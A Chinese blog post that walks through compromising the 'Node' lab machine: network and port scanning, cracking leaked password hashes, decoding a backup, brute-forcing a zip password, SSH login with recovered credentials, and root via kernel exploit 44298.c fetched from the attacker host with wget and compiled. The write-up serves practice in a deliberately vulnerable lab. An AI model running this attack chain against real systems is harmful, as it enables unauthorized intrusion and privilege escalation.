靶机7:Node

已于 2023-11-10 15:37:52 修改
阅读量97 收藏 1
点赞数
分类专栏: 靶机 文章标签: 网络 运维
于 2023-10-20 20:36:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wj33333/article/details/133934206
版权

Node靶机

1.信息收集

arp-scan -l 扫描

arp-scan -l

2.nmap扫描

nmap -sV -p- 192.168.26.130 -T4

查看3000端口

查看源码分析大量js

访问/assets/js/app/controllers/home.js发现目录

访问        /api/users/latest

发现密码

发现密文

2.cmd5解密

解密结果

tom :spongebob

mark : snowflake

restarting : 未搜到

登陆后发现都没有权限

查看他的上一级后发现多出一个密码

解密:myP14ceAdm1nAcc0uNT:manchester

登录

发现要下载文件

下载到了Downloads

用cat查看一下

可以很显然的看出为base64加密,所以使用base64进行解密

base64 -d myplace.backup > wj.backup

查看解密后的文件类型

file wj.backup

可以看到文件类型为zip,所以将后缀改为zip的格式

mv wj.backup wj.zip

然后解压压缩包

unzip wj.zip

3.fcrackzip爆破

发现是要密码,所以这里使用fcrackzip进行爆破

fcrackzip -u -D -p rockyou.txt /home/kali/Downloads/wj.zip

爆破出密码 magicword

再次解压

解压后发现目录多出一个var

去到/var/www/myplace目录下查看app.js

发现用户和密码,上面扫描出22端口,我们尝试远程登录

账户:mark

密码:5AYRft73VtFpc84k

登陆成功

查看sudo权限

发现没有权限,查看suid权限

find / -perm -u=s -type f 2>/dev/null

发现也没有

4.版本漏洞提权

查看其内核及操作系统版本

uname -a
lsb_release -a

搜索Ubuntu 16.04存在的漏洞

searchsploit linux 4.4.0 ubuntu

可以使用44298.c进行提权
将44298.c下载到本地

searchsploit -m 44298.c

然后将攻击脚本传到对方服务器上
kali:

python -m SimpleHTTPServer 800

靶机:

wget http://192.168.26.129:800/44298.c

编译

gcc 44298.c -o exp

攻击

查看root

发现flag 成功

wj33333
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Node靶机渗透测试
weixin_49340699的博客
06-17 248
Node靶机渗透测试 Node靶机渗透测试Node靶机渗透测试环境工具流程 环境 靶机;kali2020 工具 kali自带netdiscover,nmap,base64,scp,压缩包爆破工具,在线解码工具 流程 1, 内网扫描,发现主机(netdiscover主机扫描) netdiscover –i eth0 –r 192.168.4.0/24 由于是使用的虚拟机可以猜出目标ip192.168.4.60 再使用nmap –sV 192.168.4.60对目标IP进行端口扫描 发现目标开启了22;30
Vulnhub靶机系列:Node 1.0
汗的博客
04-29 412
这次的靶机是vulnhub靶机Node 1.0,还是在合天网安上测试 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权 靶机地址及相关描述 https://www.vulnhub.com/entry/node-1,252/ Node is a medium level boot2root challenge, originally created for HackT...
HTB靶机011-Node-WP
灰蜗牛
05-12 1557
HTB靶机011-Node-WP,这题比较复杂,最后提权是难点
VulnHub-Node
MRS_jianai的博客
03-25 227
VulnHub-Node靶机详细渗透教程
渗透测试实战4——Node靶机入侵
浅浅的博客
04-25 1254
一、实验环境 攻击机(Kali):192.168.247.149 靶机Node):192.168.247.152 二、实验步骤 一)主动信息收集 1、主机发现 2、端口扫描 3、端口版本信息 扫描结果发现靶机开启了22 ssh端口和3000端口,且3000端口开放的是http服务。 二)端口探测 端口3000(http服务) 1、探测目录 因为htt...
DC靶机系列:DC-8
Ays.Ie的博客
02-28 249
本篇文章为DC系列第8个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机是Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
Vulnix.7z靶机
04-25
一个vulnhub上的靶机,因为网络原因,下载的特别慢,我下载好,上传上来,供大家学习。如果大家有更好的靶机,请私我。
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu)
02-18
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu),真实有效,如有侵权,请联系csdn删除即可
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Linux网络编程:网络基础
weixin_73234157的博客
05-20 919
当我们形成计算机网络后,小明要给他的暗恋对象小红发一句“我喜欢你”,结果发给了小芳……,在计算机网络中会出现许许多多的主机,当我们进行网络通信时,我们要通过协议来找到指定的接收方。同理在单台主机中,数据从键盘中读入再转载到当前网卡也是需要协议的。简单来说:协议就是一种约定当计算机在读取数据时,发现数据中存在向网卡输送的标志(协议)时,就往网卡输送。当网卡读取到输送给小红,网卡就不会发送给小芳。
计算机网络 1
zengkui198513的博客
05-15 661
上面的每一个问题是每一层都必须面对的也都必须要解决的。每一层而且必须要覆盖上面的信息!
用docker命令行操作远程的Dockerd daemon服务
zhang197093的博客
05-15 704
本地安装Dockerd服务太耗本机磁盘空间了,共用已有的Dockerd服务能够节省一部分空间。
嵌入式学习
qq_46068832的博客
05-19 406
【代码】嵌入式学习。
计算机网络安全控制技术
最新发布
heikewhite的博客
05-25 241
防火墙技术是近年来维护网络安全最重要的手段,但是防火墙不是万能的,需要配合其他安全措施来协同。目前加密技术主要有两大类:对称加密和非对称加密。核心是识别网络者是否是属于系统的合法用户。入侵行为主要是指对系统资源的非授权使用。计算机病毒的数目和危害性都在飞速发展。控制不同的用户对信息资源的访问权限。漏洞检测和安全风险评估技术。6.网络安全漏洞扫描技术。
MQTT 异常断开(一)
m0_50668851的博客
05-21 459
MQTT异分析问题总结 前提:MQTT是基于TCP层再次封装,MQTT是不关心TCP层的实现与传输,但是如果TCP链路出现异常(丢失TCP ACK,网络延时TCP ACK等)一定会导致MQTT断开连接。 MQTT代理服务器存在如下问题: a.代理服务器,对于连接时没有及时处理收到模块关于TCP层的 TCP ACK(Seq确认包),出现重传MQTT Connect Ack。模块内部MQTT的处理逻辑,NQTT收到Connect Ack之后,模块已经准备就绪,回码OK, 但是客户......
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值